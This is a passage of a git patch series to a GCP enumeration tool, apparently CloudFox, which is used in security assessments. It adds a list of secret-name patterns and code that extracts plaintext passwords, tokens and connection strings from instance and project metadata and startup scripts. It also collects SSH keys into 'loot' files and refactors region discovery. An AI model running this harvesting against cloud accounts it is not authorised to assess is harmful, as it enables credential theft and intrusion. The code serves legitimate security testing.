fail silently if no permission) info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) instanceInfos = append(instanceInfos, info) } } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } + return instanceInfos, nil } @@ -308,6 +327,15 @@ func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]Se return accounts, hasDefaultSA, hasCloudScopes } +// SensitiveItem represents a potentially sensitive metadata item +type SensitiveItem struct { + Key string `json:"key"` + Value string `json:"value"` + Type string `json:"type"` // password, api-key, token, credential, connection-string, secret, env-var + Source string `json:"source"` // instance or project + Truncated bool `json:"truncated"` // Whether value was truncated for display +} + // MetadataParseResult contains all parsed metadata fields type MetadataParseResult struct { HasStartupScript bool @@ -320,6 +348,8 @@ type MetadataParseResult struct { StartupScriptURL string SSHKeys []string CustomMetadata []string + RawMetadata map[string]string + SensitiveItems []SensitiveItem } // parseMetadata checks instance metadata for security-relevant settings @@ -329,24 +359,73 @@ func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, bl result.OSLoginEnabled, result.OSLogin2FA, result.SerialPortEnabled } +// sensitivePatterns maps key name patterns to secret types +var sensitivePatterns = map[string]string{ + "PASSWORD": "password", + "PASSWD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "APIKEY": "api-key", + "API-KEY": "api-key", + "TOKEN": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER": "token", + "CREDENTIAL": "credential", + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "CONNECTION_STRING": "connection-string", + "CONN_STR": "connection-string", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "DB_PASS": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "REDIS_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_ACCESS_KEY": "credential", + "AWS_SECRET": "credential", + "AZURE_KEY": "credential", + "GCP_KEY": "credential", + "ENCRYPTION_KEY": "credential", + "SIGNING_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + "OAUTH": "credential", + "CLIENT_SECRET": "credential", +} + +// detectSensitiveType checks if a key name matches sensitive patterns +func detectSensitiveType(key string) string { + keyUpper := strings.ToUpper(key) + for pattern, secretType := range sensitivePatterns { + if strings.Contains(keyUpper, pattern) { + return secretType + } + } + return "" +} + // parseMetadataFull extracts all metadata including content func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { - result := MetadataParseResult{} + result := MetadataParseResult{ + RawMetadata: make(map[string]string), + } if metadata == nil || metadata.Items == nil { return result } // Known metadata keys to exclude from custom metadata knownKeys := map[string]bool{ - "startup-script": true, - "startup-script-url": true, - "ssh-keys": true, - "sshKeys": true, - "block-project-ssh-keys": true, - "enable-oslogin": true, - "enable-oslogin-2fa": true, - "serial-port-enable": true, - "google-compute-default-zone": true, + "startup-script": true, + "startup-script-url": true, + "ssh-keys": true, + "sshKeys": true, + "block-project-ssh-keys": true, + "enable-oslogin": true, + "enable-oslogin-2fa": true, + "serial-port-enable": true, + "google-compute-default-zone": true, "google-compute-default-region": true, } @@ -355,11 +434,19 @@ func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { continue } + // Store all raw metadata + if item.Value != nil { + result.RawMetadata[item.Key] = *item.Value + } + switch item.Key { case "startup-script": result.HasStartupScript = true if item.Value != nil { result.StartupScriptContent = *item.Value + // Check startup script for sensitive patterns + sensitiveItems := extractSensitiveFromScript(*item.Value, "startup-script") + result.SensitiveItems = append(result.SensitiveItems, sensitiveItems...) } case "startup-script-url": result.HasStartupScript = true @@ -398,6 +485,17 @@ func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { // Track custom metadata keys (may contain secrets) if !knownKeys[item.Key] { result.CustomMetadata = append(result.CustomMetadata, item.Key) + + // Check if key name suggests sensitive content + if item.Value != nil { + if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { + result.SensitiveItems = append(result.SensitiveItems, SensitiveItem{ + Key: item.Key, + Value: *item.Value, + Type: sensitiveType, + }) + } + } } } } @@ -405,6 +503,45 @@ func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult { return result } +// extractSensitiveFromScript extracts potential sensitive values from scripts +func extractSensitiveFromScript(script, source string) []SensitiveItem { + var items []SensitiveItem + lines := strings.Split(script, "\n") + + for _, line := range lines { + line = strings.TrimSpace(line) + // Skip comments and empty lines + if line == "" || strings.HasPrefix(line, "#") { + continue + } + + // Look for export VAR=value or VAR=value patterns + if strings.Contains(line, "=") { + // Handle export statements + line = strings.TrimPrefix(line, "export ") + + parts := strings.SplitN(line, "=", 2) + if len(parts) == 2 { + key := strings.TrimSpace(parts[0]) + value := strings.TrimSpace(parts[1]) + // Remove quotes from value + value = strings.Trim(value, "\"'") + + if sensitiveType := detectSensitiveType(key); sensitiveType != "" && value != "" { + items = append(items, SensitiveItem{ + Key: key, + Value: value, + Type: sensitiveType, + Source: source, + }) + } + } + } + } + + return items +} + // parseBootDiskEncryption checks the boot disk encryption type func parseBootDiskEncryption(disks []*compute.AttachedDisk) (encryptionType, kmsKey string) { encryptionType = "Google-managed" @@ -460,7 +597,8 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM } info := &ProjectMetadataInfo{ - ProjectID: projectID, + ProjectID: projectID, + RawMetadata: make(map[string]string), } if project.CommonInstanceMetadata != nil { @@ -469,6 +607,11 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM continue } + // Store all raw metadata + if item.Value != nil { + info.RawMetadata[item.Key] = *item.Value + } + switch item.Key { case "ssh-keys", "sshKeys": info.HasProjectSSHKeys = true @@ -485,6 +628,12 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM info.HasProjectStartupScript = true if item.Value != nil { info.ProjectStartupScript = *item.Value + // Check startup script for sensitive patterns + sensitiveItems := extractSensitiveFromScript(*item.Value, "project-startup-script") + for i := range sensitiveItems { + sensitiveItems[i].Source = "project" + } + info.SensitiveMetadata = append(info.SensitiveMetadata, sensitiveItems...) } case "enable-oslogin": if item.Value != nil && strings.ToLower(*item.Value) == "true" { @@ -502,6 +651,18 @@ func (ces *ComputeEngineService) GetProjectMetadata(projectID string) (*ProjectM // Track other custom metadata that might contain secrets if !isKnownMetadataKey(item.Key) { info.CustomMetadataKeys = append(info.CustomMetadataKeys, item.Key) + + // Check if key name suggests sensitive content + if item.Value != nil { + if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" { + info.SensitiveMetadata = append(info.SensitiveMetadata, SensitiveItem{ + Key: item.Key, + Value: *item.Value, + Type: sensitiveType, + Source: "project", + }) + } + } } } } diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go index ead36b51..3500782b 100644 --- a/gcp/services/dataprocService/dataprocService.go +++ b/gcp/services/dataprocService/dataprocService.go @@ -7,6 +7,7 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" dataproc "google.golang.org/api/dataproc/v1" ) @@ -89,15 +90,6 @@ type JobInfo struct { EndTime string `json:"endTime"` } -// Common GCP regions for Dataproc -var dataprocRegions = []string{ - "us-central1", "us-east1", "us-east4", "us-west1", "us-west2", "us-west3", "us-west4", - "europe-west1", "europe-west2", "europe-west3", "europe-west4", "europe-west6", - "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", - "asia-south1", "asia-southeast1", "asia-southeast2", - "australia-southeast1", "southamerica-east1", "northamerica-northeast1", -} - // ListClusters retrieves all Dataproc clusters func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { ctx := context.Background() @@ -109,8 +101,11 @@ func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) var clusters []ClusterInfo - // List across common regions - for _, region := range dataprocRegions { + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // List across all regions + for _, region := range regions { regionClusters, err := service.Projects.Regions.Clusters.List(projectID, region).Context(ctx).Do() if err != nil { continue // Skip regions with errors (API not enabled, no permissions, etc.) diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go index 6d85b911..a7394a58 100644 --- a/gcp/services/iapService/iapService.go +++ b/gcp/services/iapService/iapService.go @@ -7,6 +7,7 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" iap "google.golang.org/api/iap/v1" ) @@ -72,8 +73,10 @@ func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, var groups []TunnelDestGroup - // List across common regions - regions := []string{"us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1", "-"} + // Get regions from regionService (with automatic fallback) + // Also try "-" wildcard in case it's supported + regions := regionservice.GetCachedRegionNames(ctx, projectID) + regions = append(regions, "-") for _, region := range regions { parent := fmt.Sprintf("projects/%s/iap_tunnel/locations/%s", projectID, region) diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go index aad92dab..3ac8d6cb 100644 --- a/gcp/services/loadbalancerService/loadbalancerService.go +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -97,19 +97,27 @@ func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalance } } - // Get regional forwarding rules (internal, network LB) - regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() - if err == nil { - for _, region := range regionsResp.Items { - regionalRules, err := service.ForwardingRules.List(projectID, region.Name).Context(ctx).Do() - if err == nil { - for _, rule := range regionalRules.Items { - lb := s.parseForwardingRule(rule, projectID, region.Name) - loadBalancers = append(loadBalancers, lb) - } + // Get all regional forwarding rules using AggregatedList (internal, network LB) + // This only requires compute.forwardingRules.list permission (not compute.regions.list) + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1") + region := "unknown" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } + for _, rule := range scopedList.ForwardingRules { + lb := s.parseForwardingRule(rule, projectID, region) + loadBalancers = append(loadBalancers, lb) } } - } + return nil + }) + // Ignore errors - we still return what we found from global rules return loadBalancers, nil } @@ -155,28 +163,32 @@ func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendSe var backends []BackendServiceInfo - // Global backend services - globalBackends, err := service.BackendServices.List(projectID).Context(ctx).Do() - if err == nil { - for _, backend := range globalBackends.Items { - info := s.parseBackendService(backend, projectID) - backends = append(backends, info) - } - } - - // Regional backend services - regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() - if err == nil { - for _, region := range regionsResp.Items { - regionalBackends, err := service.RegionBackendServices.List(projectID, region.Name).Context(ctx).Do() - if err == nil { - for _, backend := range regionalBackends.Items { - info := s.parseRegionalBackendService(backend, projectID, region.Name) - backends = append(backends, info) + // Get all backend services (global and regional) using AggregatedList + // This only requires compute.backendServices.list permission (not compute.regions.list) + req := service.BackendServices.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.BackendServiceAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.BackendServices == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1" or "global") + region := "global" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } + for _, backend := range scopedList.BackendServices { + var info BackendServiceInfo + if region == "global" { + info = s.parseBackendService(backend, projectID) + } else { + info = s.parseRegionalBackendService(backend, projectID, region) } + backends = append(backends, info) } } - } + return nil + }) + // Ignore errors - return empty list if we can't access return backends, nil } diff --git a/gcp/services/regionService/regionService.go b/gcp/services/regionService/regionService.go new file mode 100644 index 00000000..90ca8dc1 --- /dev/null +++ b/gcp/services/regionService/regionService.go @@ -0,0 +1,335 @@ +// Package regionservice provides a unified way to enumerate GCP regions and zones +// with automatic fallback when permissions are denied. +// +// Fallback order: +// 1. Try Compute Engine Regions.List API (requires compute.regions.list) +// 2. Fall back to public Google endpoint (no auth required) +// 3. Fall back to hardcoded common regions list +package regionservice + +import ( + "context" + "encoding/json" + "fmt" + "net/http" + "sort" + "strings" + "sync" + "time" + + "google.golang.org/api/compute/v1" +) + +// GCPCloudIPRangesURL is the public Google endpoint that lists all GCP regions +// This endpoint requires no authentication and is updated by Google +const GCPCloudIPRangesURL = "https://www.gstatic.com/ipranges/cloud.json" + +// RegionService provides methods to enumerate GCP regions and zones +type RegionService struct { + computeService *compute.Service + httpClient *http.Client +} + +// RegionInfo contains information about a GCP region +type RegionInfo struct { + Name string // Region name (e.g., "us-central1") + Zones []string // Available zones in this region + Status string // Region status (UP, DOWN, or unknown) +} + +// New creates a new RegionService +func New() *RegionService { + return &RegionService{ + httpClient: &http.Client{Timeout: 10 * time.Second}, + } +} + +// NewWithComputeService creates a RegionService with an existing compute service +func NewWithComputeService(svc *compute.Service) *RegionService { + return &RegionService{ + computeService: svc, + httpClient: &http.Client{Timeout: 10 * time.Second}, + } +} + +// GetRegions returns all GCP regions with automatic fallback +// Tries in order: Compute API -> Public endpoint -> Hardcoded list +func (s *RegionService) GetRegions(ctx context.Context, projectID string) ([]RegionInfo, error) { + // Try Compute Engine API first (most accurate, includes zones) + if projectID != "" { + regions, err := s.getRegionsFromComputeAPI(ctx, projectID) + if err == nil && len(regions) > 0 { + return regions, nil + } + // Log but continue to fallback + } + + // Fall back to public endpoint + regions, err := s.getRegionsFromPublicEndpoint() + if err == nil && len(regions) > 0 { + return regions, nil + } + + // Fall back to hardcoded list + return s.getHardcodedRegions(), nil +} + +// GetRegionNames returns just the region names (convenience method) +func (s *RegionService) GetRegionNames(ctx context.Context, projectID string) []string { + regions, _ := s.GetRegions(ctx, projectID) + names := make([]string, len(regions)) + for i, r := range regions { + names[i] = r.Name + } + return names +} + +// GetAllZones returns all zones across all regions +func (s *RegionService) GetAllZones(ctx context.Context, projectID string) []string { + regions, _ := s.GetRegions(ctx, projectID) + var zones []string + for _, r := range regions { + zones = append(zones, r.Zones...) + } + return zones +} + +// getRegionsFromComputeAPI tries to get regions from the Compute Engine API +func (s *RegionService) getRegionsFromComputeAPI(ctx context.Context, projectID string) ([]RegionInfo, error) { + svc := s.computeService + if svc == nil { + var err error + svc, err = compute.NewService(ctx) + if err != nil { + return nil, err + } + } + + resp, err := svc.Regions.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + regions := make([]RegionInfo, 0, len(resp.Items)) + for _, r := range resp.Items { + info := RegionInfo{ + Name: r.Name, + Status: r.Status, + Zones: make([]string, 0, len(r.Zones)), + } + for _, zoneURL := range r.Zones { + // Extract zone name from URL + parts := strings.Split(zoneURL, "/") + if len(parts) > 0 { + info.Zones = append(info.Zones, parts[len(parts)-1]) + } + } + regions = append(regions, info) + } + + return regions, nil +} + +// cloudIPRangesResponse represents the JSON structure from cloud.json +type cloudIPRangesResponse struct { + SyncToken string `json:"syncToken"` + CreationTime string `json:"creationTime"` + Prefixes []cloudPrefix `json:"prefixes"` +} + +type cloudPrefix struct { + IPv4Prefix string `json:"ipv4Prefix,omitempty"` + IPv6Prefix string `json:"ipv6Prefix,omitempty"` + Service string `json:"service"` + Scope string `json:"scope"` +} + +// getRegionsFromPublicEndpoint fetches regions from the public Google endpoint +func (s *RegionService) getRegionsFromPublicEndpoint() ([]RegionInfo, error) { + resp, err := s.httpClient.Get(GCPCloudIPRangesURL) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d", resp.StatusCode) + } + + var data cloudIPRangesResponse + if err := json.NewDecoder(resp.Body).Decode(&data); err != nil { + return nil, err + } + + // Extract unique regions + regionSet := make(map[string]bool) + for _, prefix := range data.Prefixes { + scope := prefix.Scope + if scope == "" || scope == "global" { + continue + } + if strings.Contains(scope, "-") && containsDigit(scope) { + regionSet[scope] = true + } + } + + // Convert to RegionInfo with generated zones + regions := make([]RegionInfo, 0, len(regionSet)) + for region := range regionSet { + info := RegionInfo{ + Name: region, + Status: "unknown", + Zones: generateZonesForRegion(region), + } + regions = append(regions, info) + } + + // Sort by name + sort.Slice(regions, func(i, j int) bool { + return regions[i].Name < regions[j].Name + }) + + return regions, nil +} + +// getHardcodedRegions returns a hardcoded list of common GCP regions +func (s *RegionService) getHardcodedRegions() []RegionInfo { + regions := make([]RegionInfo, len(commonGCPRegions)) + for i, name := range commonGCPRegions { + regions[i] = RegionInfo{ + Name: name, + Status: "unknown", + Zones: generateZonesForRegion(name), + } + } + return regions +} + +// generateZonesForRegion generates common zone names for a region +func generateZonesForRegion(region string) []string { + // Most regions have zones a, b, c; some have more + suffixes := []string{"a", "b", "c"} + zones := make([]string, len(suffixes)) + for i, suffix := range suffixes { + zones[i] = region + "-" + suffix + } + return zones +} + +// containsDigit checks if a string contains at least one digit +func containsDigit(s string) bool { + for _, c := range s { + if c >= '0' && c <= '9' { + return true + } + } + return false +} + +// commonGCPRegions is a hardcoded fallback list of common GCP regions +var commonGCPRegions = []string{ + "africa-south1", + "asia-east1", + "asia-east2", + "asia-northeast1", + "asia-northeast2", + "asia-northeast3", + "asia-south1", + "asia-south2", + "asia-southeast1", + "asia-southeast2", + "australia-southeast1", + "australia-southeast2", + "europe-central2", + "europe-north1", + "europe-southwest1", + "europe-west1", + "europe-west2", + "europe-west3", + "europe-west4", + "europe-west6", + "europe-west8", + "europe-west9", + "europe-west10", + "europe-west12", + "me-central1", + "me-central2", + "me-west1", + "northamerica-northeast1", + "northamerica-northeast2", + "southamerica-east1", + "southamerica-west1", + "us-central1", + "us-east1", + "us-east4", + "us-east5", + "us-south1", + "us-west1", + "us-west2", + "us-west3", + "us-west4", +} + +// ---- Cached singleton for convenience ---- + +var ( + defaultService *RegionService + defaultServiceOnce sync.Once + cachedRegions []RegionInfo + cachedRegionsMu sync.RWMutex + cacheTime time.Time + cacheTTL = 1 * time.Hour +) + +// GetDefaultService returns a singleton RegionService +func GetDefaultService() *RegionService { + defaultServiceOnce.Do(func() { + defaultService = New() + }) + return defaultService +} + +// GetCachedRegions returns cached regions, refreshing if stale +// This is the recommended function for most use cases +func GetCachedRegions(ctx context.Context, projectID string) []RegionInfo { + cachedRegionsMu.RLock() + if len(cachedRegions) > 0 && time.Since(cacheTime) < cacheTTL { + result := make([]RegionInfo, len(cachedRegions)) + copy(result, cachedRegions) + cachedRegionsMu.RUnlock() + return result + } + cachedRegionsMu.RUnlock() + + // Fetch fresh + svc := GetDefaultService() + regions, _ := svc.GetRegions(ctx, projectID) + + // Update cache + cachedRegionsMu.Lock() + cachedRegions = regions + cacheTime = time.Now() + cachedRegionsMu.Unlock() + + return regions +} + +// GetCachedRegionNames returns just region names from cache +func GetCachedRegionNames(ctx context.Context, projectID string) []string { + regions := GetCachedRegions(ctx, projectID) + names := make([]string, len(regions)) + for i, r := range regions { + names[i] = r.Name + } + return names +} + +// GetCachedZones returns all zones from cached regions +func GetCachedZones(ctx context.Context, projectID string) []string { + regions := GetCachedRegions(ctx, projectID) + var zones []string + for _, r := range regions { + zones = append(zones, r.Zones...) + } + return zones +} diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go index 724477ba..8eecf566 100644 --- a/gcp/services/resourceIAMService/resourceIAMService.go +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -10,6 +10,7 @@ import ( "cloud.google.com/go/kms/apiv1/kmspb" "cloud.google.com/go/pubsub" "cloud.google.com/go/storage" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" run "google.golang.org/api/run/v1" @@ -432,8 +433,10 @@ func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([ } defer client.Close() - // List key rings in all locations - locations := []string{"global", "us", "us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1"} + // Get regions from regionService (with automatic fallback) plus global and multi-region locations + regions := regionservice.GetCachedRegionNames(ctx, projectID) + // Add global and multi-region locations that KMS supports + locations := append([]string{"global", "us", "eu", "asia"}, regions...) for _, location := range locations { parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go index 18fd8176..d9355e96 100644 --- a/gcp/services/schedulerService/schedulerService.go +++ b/gcp/services/schedulerService/schedulerService.go @@ -8,30 +8,10 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" scheduler "google.golang.org/api/cloudscheduler/v1" ) -// schedulerRegions contains all Cloud Scheduler regions -// Note: Cloud Scheduler API does NOT support the "-" wildcard for locations -// so we need to iterate through regions explicitly -var schedulerRegions = []string{ - // Americas - "northamerica-northeast1", "northamerica-northeast2", - "southamerica-east1", "southamerica-west1", - "us-central1", "us-east1", "us-east4", "us-east5", - "us-south1", "us-west1", "us-west2", "us-west3", "us-west4", - // Europe - "europe-central2", "europe-north1", - "europe-southwest1", "europe-west1", "europe-west2", "europe-west3", - "europe-west4", "europe-west6", "europe-west8", "europe-west9", - // Asia Pacific - "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", - "asia-south1", "asia-south2", "asia-southeast1", "asia-southeast2", - "australia-southeast1", "australia-southeast2", - // Middle East & Africa - "africa-south1", "me-central1", "me-west1", -} - type SchedulerService struct{ session *gcpinternal.SafeSession } @@ -107,8 +87,11 @@ func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { // Use a semaphore to limit concurrent API calls semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + // Iterate through all Scheduler regions in parallel - for _, region := range schedulerRegions { + for _, region := range regions { wg.Add(1) go func(region string) { defer wg.Done() diff --git a/internal/gcp/org_cache.go b/internal/gcp/org_cache.go index e1ca0ee4..fedf5a05 100644 --- a/internal/gcp/org_cache.go +++ b/internal/gcp/org_cache.go @@ -160,6 +160,32 @@ func (c *OrgCache) GetStats() (orgs, folders, projects int) { return len(c.Organizations), len(c.Folders), len(c.AllProjects) } +// HasProject returns true if the project ID exists in the org cache +func (c *OrgCache) HasProject(projectID string) bool { + c.mu.RLock() + defer c.mu.RUnlock() + _, exists := c.ProjectByID[projectID] + return exists +} + +// GetProjectScope returns the scope of a project relative to the org cache: +// - "Internal" if the project is in the cache (part of enumerated org) +// - "External" if the cache is populated but project is not in it +// - "Unknown" if the cache is not populated +func (c *OrgCache) GetProjectScope(projectID string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + if !c.Populated { + return "Unknown" + } + + if _, exists := c.ProjectByID[projectID]; exists { + return "Internal" + } + return "External" +} + // GetProjectsInOrg returns all project IDs belonging to an organization func (c *OrgCache) GetProjectsInOrg(orgID string) []string { c.mu.RLock() diff --git a/internal/gcp/persistent_cache.go b/internal/gcp/persistent_cache.go index c7805355..6df74e6f 100644 --- a/internal/gcp/persistent_cache.go +++ b/internal/gcp/persistent_cache.go @@ -10,6 +10,10 @@ import ( "time" ) +// DefaultCacheExpiration is the default time after which cache is considered stale +// and will be automatically refreshed +const DefaultCacheExpiration = 24 * time.Hour + // atomicWriteGob writes data to a file atomically using a temp file and rename // This prevents corruption if the process is interrupted during write func atomicWriteGob(filename string, data interface{}) error { diff --git a/internal/gcp/regions.go b/internal/gcp/regions.go new file mode 100644 index 00000000..e7915e75 --- /dev/null +++ b/internal/gcp/regions.go @@ -0,0 +1,201 @@ +package gcpinternal + +import ( + "encoding/json" + "fmt" + "net/http" + "sort" + "strings" + "sync" + "time" +) + +// GCPCloudIPRangesURL is the public Google endpoint that lists all GCP regions +// This endpoint requires no authentication and is updated by Google +const GCPCloudIPRangesURL = "https://www.gstatic.com/ipranges/cloud.json" + +// cloudIPRangesResponse represents the JSON structure from cloud.json +type cloudIPRangesResponse struct { + SyncToken string `json:"syncToken"` + CreationTime string `json:"creationTime"` + Prefixes []cloudPrefix `json:"prefixes"` +} + +// cloudPrefix represents a single IP prefix entry +type cloudPrefix struct { + IPv4Prefix string `json:"ipv4Prefix,omitempty"` + IPv6Prefix string `json:"ipv6Prefix,omitempty"` + Service string `json:"service"` + Scope string `json:"scope"` +} + +// cachedRegions holds the cached region list with expiration +var ( + cachedRegions []string + cachedZones []string + regionsCacheTime time.Time + regionsCacheMutex sync.RWMutex + regionsCacheTTL = 24 * time.Hour +) + +// GetGCPRegions returns a list of all GCP regions from the public cloud.json endpoint +// This does not require any GCP authentication or permissions +// Results are cached for 24 hours +func GetGCPRegions() ([]string, error) { + regionsCacheMutex.RLock() + if len(cachedRegions) > 0 && time.Since(regionsCacheTime) < regionsCacheTTL { + regions := make([]string, len(cachedRegions)) + copy(regions, cachedRegions) + regionsCacheMutex.RUnlock() + return regions, nil + } + regionsCacheMutex.RUnlock() + + // Fetch fresh data + regions, err := fetchGCPRegionsFromPublicEndpoint() + if err != nil { + return nil, err + } + + // Cache the results + regionsCacheMutex.Lock() + cachedRegions = regions + regionsCacheTime = time.Now() + regionsCacheMutex.Unlock() + + return regions, nil +} + +// fetchGCPRegionsFromPublicEndpoint fetches regions from the public Google endpoint +func fetchGCPRegionsFromPublicEndpoint() ([]string, error) { + client := &http.Client{Timeout: 10 * time.Second} + resp, err := client.Get(GCPCloudIPRangesURL) + if err != nil { + return nil, fmt.Errorf("failed to fetch GCP regions: %w", err) + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("failed to fetch GCP regions: HTTP %d", resp.StatusCode) + } + + var data cloudIPRangesResponse + if err := json.NewDecoder(resp.Body).Decode(&data); err != nil { + return nil, fmt.Errorf("failed to parse GCP regions response: %w", err) + } + + // Extract unique regions from scopes + regionSet := make(map[string]bool) + for _, prefix := range data.Prefixes { + scope := prefix.Scope + // Skip global and empty scopes + if scope == "" || scope == "global" { + continue + } + // Only include scopes that look like regions (contain a hyphen and number) + if strings.Contains(scope, "-") && containsDigit(scope) { + regionSet[scope] = true + } + } + + // Convert to sorted slice + regions := make([]string, 0, len(regionSet)) + for region := range regionSet { + regions = append(regions, region) + } + sort.Strings(regions) + + return regions, nil +} + +// GetGCPZonesForRegion returns common zone suffixes for a region +// GCP zones are typically region + letter suffix (a, b, c, d, etc.) +func GetGCPZonesForRegion(region string) []string { + // Most regions have zones a, b, c; some have more + commonSuffixes := []string{"a", "b", "c", "d", "f"} + zones := make([]string, len(commonSuffixes)) + for i, suffix := range commonSuffixes { + zones[i] = region + "-" + suffix + } + return zones +} + +// GetAllGCPZones returns all possible zones for all regions +// This is a best-effort list based on common zone naming patterns +func GetAllGCPZones() ([]string, error) { + regions, err := GetGCPRegions() + if err != nil { + return nil, err + } + + var zones []string + for _, region := range regions { + zones = append(zones, GetGCPZonesForRegion(region)...) + } + return zones, nil +} + +// containsDigit checks if a string contains at least one digit +func containsDigit(s string) bool { + for _, c := range s { + if c >= '0' && c <= '9' { + return true + } + } + return false +} + +// CommonGCPRegions is a hardcoded fallback list of common GCP regions +// Used if the public endpoint is unavailable +var CommonGCPRegions = []string{ + "africa-south1", + "asia-east1", + "asia-east2", + "asia-northeast1", + "asia-northeast2", + "asia-northeast3", + "asia-south1", + "asia-south2", + "asia-southeast1", + "asia-southeast2", + "australia-southeast1", + "australia-southeast2", + "europe-central2", + "europe-north1", + "europe-southwest1", + "europe-west1", + "europe-west2", + "europe-west3", + "europe-west4", + "europe-west6", + "europe-west8", + "europe-west9", + "europe-west10", + "europe-west12", + "me-central1", + "me-central2", + "me-west1", + "northamerica-northeast1", + "northamerica-northeast2", + "southamerica-east1", + "southamerica-west1", + "us-central1", + "us-east1", + "us-east4", + "us-east5", + "us-south1", + "us-west1", + "us-west2", + "us-west3", + "us-west4", +} + +// GetGCPRegionsWithFallback returns regions from the public endpoint, +// falling back to the hardcoded list if the endpoint is unavailable +func GetGCPRegionsWithFallback() []string { + regions, err := GetGCPRegions() + if err != nil || len(regions) == 0 { + return CommonGCPRegions + } + return regions +} From 8a248e3127ae56ae9a19fb9ea7dc40ae97a9df35 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Wed, 4 Feb 2026 21:53:51 -0500 Subject: [PATCH 36/48] updated instances --- gcp/commands/instances.go | 303 +++++++++++++++-- .../computeEngineService.go | 307 +++++++++++++----- 2 files changed, 510 insertions(+), 100 deletions(-) diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index cf00f57a..157dccbf 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -171,17 +171,33 @@ func (m *InstancesModule) processProject(ctx context.Context, projectID string, Name: "instances-metadata", Contents: "", } + m.LootMap[projectID]["instances-ssh-keys"] = &internal.LootFile{ + Name: "instances-ssh-keys", + Contents: "# GCP Compute Engine SSH Keys\n# Generated by CloudFox\n# Format: user:key-type KEY comment\n\n", + } } // Generate loot for each instance for _, instance := range instances { m.addInstanceToLoot(projectID, instance) m.addInstanceMetadataToLoot(projectID, instance) + m.addInstanceSSHKeysToLoot(projectID, instance) } // Add project metadata to loot m.addProjectMetadataToLoot(projectID, projectMeta) m.addProjectMetadataFullToLoot(projectID, projectMeta) + m.addProjectSSHKeysToLoot(projectID, projectMeta) 